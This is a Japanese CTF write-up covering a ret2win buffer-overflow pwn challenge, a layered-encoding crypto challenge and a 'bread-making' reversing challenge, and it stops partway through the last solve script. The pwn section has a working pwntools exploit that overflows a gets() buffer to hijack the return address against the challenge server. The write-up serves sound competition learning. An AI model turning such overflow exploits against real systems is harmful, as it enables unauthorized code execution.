("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") RIP: 0x40142f (<main+138>: ret) R8 : 0x7ffff7dcf8c0 --> 0x0 R9 : 0x7ffff7fd84c0 (0x00007ffff7fd84c0) R10: 0x3 R11: 0x246 R12: 0x401110 (<_start>: endbr64) R13: 0x7fffffffdf00 --> 0x1 R14: 0x0 R15: 0x0 EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x401424 <main+127>: call 0x4010e0 <gets@plt> 0x401429 <main+132>: mov eax,0x0 0x40142e <main+137>: leave => 0x40142f <main+138>: ret 0x401430 <__libc_csu_init>: endbr64 0x401434 <__libc_csu_init+4>: push r15 0x401436 <__libc_csu_init+6>: lea r15,[rip+0x29d3] # 0x403e10 0x40143d <__libc_csu_init+13>: push r14 [------------------------------------stack-------------------------------------] 0000| 0x7fffffffde28 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") 0008| 0x7fffffffde30 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") 0016| 0x7fffffffde38 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") 0024| 0x7fffffffde40 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") 0032| 0x7fffffffde48 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL") 0040| 0x7fffffffde50 ("AJAAfAA5AAKAAgAA6AAL") 0048| 0x7fffffffde58 ("AAKAAgAA6AAL") 0056| 0x7fffffffde60 --> 0x4c414136 ('6AAL') [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x000000000040142f in main () gdb-peda$ patto AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL found at offset: 40
40バイトのあと、super_generic_flag_reading_function_please_ret_to_me関数のアドレス(0x4011f6)をセットすればよい。
from pwn import * if len(sys.argv) == 1: p = remote('mc.ax', 31077) else: p = process('./ret2generic-flag-reader') payload = 'A' * 40 payload += p64(0x4011f6) data = p.recvline().rstrip() print data data = p.recvline().rstrip() print data data = p.recvline().rstrip() print data data = p.recvline().rstrip() print data print payload p.sendline(payload) data = p.recvline().rstrip() print data
実行結果は以下の通り。
[+] Opening connection to mc.ax on port 31077: Done alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable... how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function! slap on some flavortext and there's no way rob will fire me now! this is genius!! what do you think? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�@\x00\x00 flag{rob-loved-the-challenge-but-im-still-paid-minimum-wage} [*] Closed connection to mc.ax port 31077
flag{rob-loved-the-challenge-but-im-still-paid-minimum-wage}
round-the-bases (crypto)
次々と以下の順でデコードする。
・base85 ・base64 ・base16 ・ASCII ・ASCII ・2進数デコード
#!/usr/bin/python3 from base64 import * with open('round-the-bases', 'r') as f: data = f.read() data = a85decode(data) print('[+] 1:', data) data = b64decode(data) print('[+] 2:', data) data = b16decode(data) print('[+] 3:', data) codes = map(int, data.split(b' ')) data = ''.join([chr(code) for code in codes]).encode() print('[+] 4:', data) codes = map(int, data.split(b' ')) data = ''.join([chr(code) for code in codes]).encode() print('[+] 5:', data) bin_code = data.replace(b'<', b'0').replace(b'=', b'1') data = ''.join([chr(int(bin_code[i:i+8], 2)) for i in range(0, len(bin_code), 8)]).encode() print('[*] flag:', data)
実行結果は以下の通り。
[+] 1: b'MzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOQ==' [+] 2: b'3534203438203332203534203439203332203534203439203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203438203332203534203438203332203534203438203332203534203439203332203534203438203332203534203439203332203534203439203332203534203438203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203438203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203438203332203534203438203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203439203332203534203439203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203438203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203438203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203438203332203534203438203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203438203332203534203438203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203438203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203438203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439' [+] 3: b'54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 48 32 54 48 32 54 49 32 54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 48 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 48 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 48 32 54 48 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 48 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49' [+] 4: b'60 61 61 60 60 61 61 60 60 61 61 60 61 61 60 60 60 61 61 60 60 60 60 61 60 61 61 60 60 61 61 61 60 61 61 61 61 60 61 61 60 61 61 61 60 61 61 61 60 60 61 61 60 60 60 60 60 61 61 61 60 61 61 61 60 61 60 61 61 61 61 61 60 61 61 61 60 61 60 60 60 61 61 60 61 60 60 60 60 60 61 61 60 61 60 60 60 61 61 61 60 61 60 60 60 61 60 61 61 61 61 61 60 61 61 61 60 61 61 61 60 60 61 61 60 61 60 60 60 61 61 61 60 60 61 61 60 61 60 61 61 61 61 61 60 60 61 61 60 61 60 60 60 61 61 60 61 61 60 60 60 61 61 60 61 61 60 60 60 61 60 61 61 61 61 61 60 61 61 61 60 61 61 61 60 61 61 61 60 60 61 60 60 60 61 61 60 61 60 60 60 61 61 61 60 60 60 60 60 61 61 61 60 60 60 60 60 60 61 61 60 60 61 61 60 61 61 60 60 61 60 60 60 61 60 61 61 61 61 61 60 61 61 61 60 61 60 61 60 61 61 61 60 60 60 60 60 61 61 61 61 61 60 61' [+] 5: b'<==<<==<<==<==<<<==<<<<=<==<<===<====<==<===<===<<==<<<<<===<===<=<=====<===<=<<<==<=<<<<<==<=<<<===<=<<<=<=====<===<===<<==<=<<<===<<==<=<=====<<==<=<<<==<==<<<==<==<<<=<=====<===<===<===<<=<<<==<=<<<===<<<<<===<<<<<<==<<==<==<<=<<<=<=====<===<=<=<===<<<<<=====<=' [*] flag: b'flag{w0w_th4t_w4s_4ll_wr4pp3d_up}'
flag{w0w_th4t_w4s_4ll_wr4pp3d_up}
bread-making (rev)
Ghidraでデコンパイルする。
undefined8 FUN_00102180(void) { undefined *puVar1; long lVar2; int iVar3; char *pcVar4; size_t sVar5; long lVar6; long in_FS_OFFSET; char acStack200 [136]; long local_40; local_40 = *(long *)(in_FS_OFFSET + 0x28); setbuf(stdin,(char *)0x0); setbuf(stdout,(char *)0x0); setbuf(stderr,(char *)0x0); signal(0xe,FUN_001024d0); DAT_00106440 = 0; do { alarm(*(uint *)(&PTR_DAT_00106020)[DAT_00106440]); puts(*(char **)((&PTR_DAT_00106020)[DAT_00106440] + 8)); do { pcVar4 = fgets(acStack200,0x80,stdin); if (pcVar4 == (char *)0x0) { LAB_00102330: FUN_001024a0(); goto LAB_00102337; } sVar5 = strcspn(acStack200,"\n"); acStack200[sVar5] = '\0'; puVar1 = (&PTR_DAT_00106020)[DAT_00106440]; lVar2 = *(long *)(puVar1 + 0x18); if (lVar2 == 0) goto LAB_00102330; lVar6 = 0; while( true ) { iVar3 = strcmp(acStack200,*(char **)(puVar1 + lVar6 * 0x10 + 0x20)); if (iVar3 == 0) break; lVar6 = lVar6 + 1; if (lVar2 == lVar6) goto LAB_00102330; } iVar3 = (**(code **)(puVar1 + lVar6 * 0x10 + 0x28))(); if (iVar3 == -1) goto LAB_00102330; } while (iVar3 != 0); DAT_00106440 = DAT_00106440 + 1; puts(""); } while (DAT_00106440 < 0xb); alarm(0); puts("it\'s the next morning"); if (_DAT_0010641c == 0) { puts("mom finds flour in the sink and accuses you of making bread"); } else { if (_DAT_00106418 == 0) { LAB_00102337: puts("mom finds flour on the counter and accuses you of making bread"); } else { if (_DAT_00106414 == 0) { puts("mom finds burnt bread on the counter and accuses you of making bread"); } else { if (_DAT_00106410 == 0) { puts("mom finds the window opened and accuses you of making bread"); } else { if (_DAT_0010640c == 0) { puts("mom finds the fire alarm in the laundry room and accuses you of making bread"); } else { FUN_001025c0(); } } } } } if (local_40 == *(long *)(in_FS_OFFSET + 0x28)) { return 0; } /* WARNING: Subroutine does not return */ __stack_chk_fail(); } void FUN_001025c0(void) { FILE *__stream; char *pcVar1; long in_FS_OFFSET; char acStack152 [136]; long local_10; local_10 = *(long *)(in_FS_OFFSET + 0x28); puts("mom doesn\'t suspect a thing, but asks about some white dots on the bathroom floor"); __stream = fopen("flag.txt","r"); if (__stream != (FILE *)0x0) { pcVar1 = fgets(acStack152,0x80,__stream); if (pcVar1 != (char *)0x0) { puts(acStack152); goto LAB_00102634; } } puts("couldn\'t open/read flag file, contact an admin if running on server"); LAB_00102634: if (local_10 == *(long *)(in_FS_OFFSET + 0x28)) { return; } /* WARNING: Subroutine does not return */ __stack_chk_fail(); } s_add_ingredients_to_the_bowl_00103b3c XREF[2]: FUN_00102180:00102220(*), 00106348(*) 00103b3c 61 64 64 ds "add ingredients to the bowl" 20 69 6e 67 72 65 s_add_flour_00103b58 XREF[3]: FUN_00102180:00102297(*), FUN_00102180:00102332(*), 00106360(*) 00103b58 61 64 64 ds "add flour" 20 66 6c 6f 75 72 00 s_add_yeast_00103b62 XREF[2]: FUN_00102180:00102297(*), 00106370(*) 00103b62 61 64 64 ds "add yeast" 20 79 65 61 73 74 00 s_add_salt_00103b6c XREF[1]: 00106380(*) 00103b6c 61 64 64 ds "add salt" 20 73 61 6c 74 00 s_add_water_00103b75 XREF[1]: 00106390(*) 00103b75 61 64 64 ds "add water" 20 77 61 74 65 72 00 00103b7f 00 ?? 00h
このあたりの文字列を確認しながら、いろいろと試してみて、正しい回答を導き出す。
from pwn import * if len(sys.argv) == 1: p = remote('mc.ax', 31796) else: p = process('./bread') ## add ingredients to the bowl ## todoes = ['add flour', 'add yeast', 'add salt', 'add water'] data = p.recvline().rstrip() print data for i in range(4): print todoes[i] p.sendline(todoes[i]) data = p.recvline().rstrip() print data data = p.recvline().rstrip() print data ## the ingredients are added and stirred into a lumpy dough ## todoes = 'hide the bowl inside a box' data = p.recvline().rstrip() print data print todoes p.sendline(todoes) data = p.recvline().rstrip() print data data = p.recvline().rstrip() print data ## the bread needs to rise ## todoes = 'wait 3 hours' data = p.recvline().rstrip() print data print todoes p.sendline(todoes) data = p.recvline().rstrip() print data data = p.recvline().rstrip() print data ## it is time to finish the dough ## todoes = 'work in the basement' data = p.recvline().rstrip() print data print todoes p.sendline(todoes) data = p.recvline().rstrip() print data data = p.recvline().rstrip() print data ## the dough is done, and needs to be baked ## todoes = 'preheat the toaster oven' data = p.recvline().rstrip() print data print todoes p.sendline(todoes) data = p.recvline().rstrip() print data data = p.recvline().rstrip() print data ## the bread is in the oven, and bakes for 45 minutes ## todoes = 'set a timer on your phone' data = p.recvline().rstrip() print data print todoes p.sendline(todoes) data = p.recvline().rstrip() print data data = p.recvline().rstrip() print data ## 45 minutes is an awfully long time ## todoes = 'watch the bread bake' data = p.recvline().rstrip() print data print todoes p.sendline(todoes) data = p.recvline().rstrip() print data data = p.recvline().rstrip() print data ## there's no time to waste ## todoes = ['pull the tray out with a towel'] data = p.recvline().rstrip() print data for i in range(1): print todoes[i] p.sendline(todoes[i]) data = p.recvline().rstrip() print data data = p.recvline().rstrip() print data ## there's smoke in the air ## todoes = ['unplug the oven', 'unplug the fire alarm', 'open the window'] data = p.recvline().rstrip() print data for i in range(3): print todoes[i] p.sendline(todoes[i]) data = p.recvline().rstrip() print data data = p.recvline().rstrip() print data ## the kitchen is a mess ## todoes = ['wash the sink', 'clean the counters', 'flush the bread down the toilet', 'get ready to sleep'] data = p.recvline().rstrip() print data for i in range(4): print todoes[i] p.sendline(todoes[i]) data = p.recvline().rstrip() print data data = p.recvline().rstrip() print data ## time to go to sleep ## todoes = ['close the window', 'replace the fire alarm', 'brush teeth and go to bed'] data = 